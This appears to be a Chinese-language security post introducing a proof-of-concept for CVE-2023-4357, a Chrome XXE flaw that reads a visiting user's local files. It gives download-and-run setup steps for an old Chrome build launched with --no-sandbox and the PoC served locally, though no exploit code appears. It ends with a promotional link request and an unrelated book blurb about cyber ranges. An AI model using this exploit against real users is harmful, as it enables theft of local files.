===================================
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。0x01 工具介绍
1、CVE-2023-4357-Chrome-XXE
2、Chrome XXE 漏洞 POC
3、实现对访客者本地文件读取
0x02 安装与使用
一、Linux实现
1、下载并运行 Chrome
wget https://edgedl.me.gvt1.com/edgedl/chrome/chrome-for-testing/114.0.5735.90/linux64/chrome-linux64.zip
unzip chrome-linux64.zip
./chrome-linux64/chrome --no-sandbox
2、启动 Web 服务
wget https://codeload.github.com/xcanwin/CVE-2023-4357-Chrome-XXE/zip/refs/heads/main -O CVE-2023-4357-Chrome-XXE.zip
unzip CVE-2023-4357-Chrome-XXE.zip
python3 -m http.server 8888 -d CVE-2023-4357-Chrome-XXE-main
3、浏览器访问
![]()
二、Windows实现
1、下载并运行 Chrome
https://edgedl.me.gvt1.com/edgedl/chrome/chrome-for-testing/114.0.5735.90/win64/chrome-win64.zip
./chrome-win64/chrome --no-sandbox
2、启动 Web 服务
https://codeload.github.com/xcanwin/CVE-2023-4357-Chrome-XXE/zip/refs/heads/main
python3 -m http.server 8888 -d CVE-2023-4357-Chrome-XXE-main
3、浏览器访问
![]()
2、关注公众号追梦前后台回复:工具,获取网盘下载链接
为了使读者能更准确地把握网络靶场的实际功能,本书以网络靶场运作的核心业务——攻防演练为主线,以点带面,从活动策划到组织实施,从平台构建到风险管控,从指挥调度到成果应用,提供了较为系统全面的操作说明。全书在内容编排上充分考虑到既能让读者多了解网络靶场与攻防演练的相关背景知识,也能按图索骥,便捷地定位到自己感兴趣的部分进行阅读,尽快在与自己相关的网络安全工作里把网络靶场与攻防演练应用起来。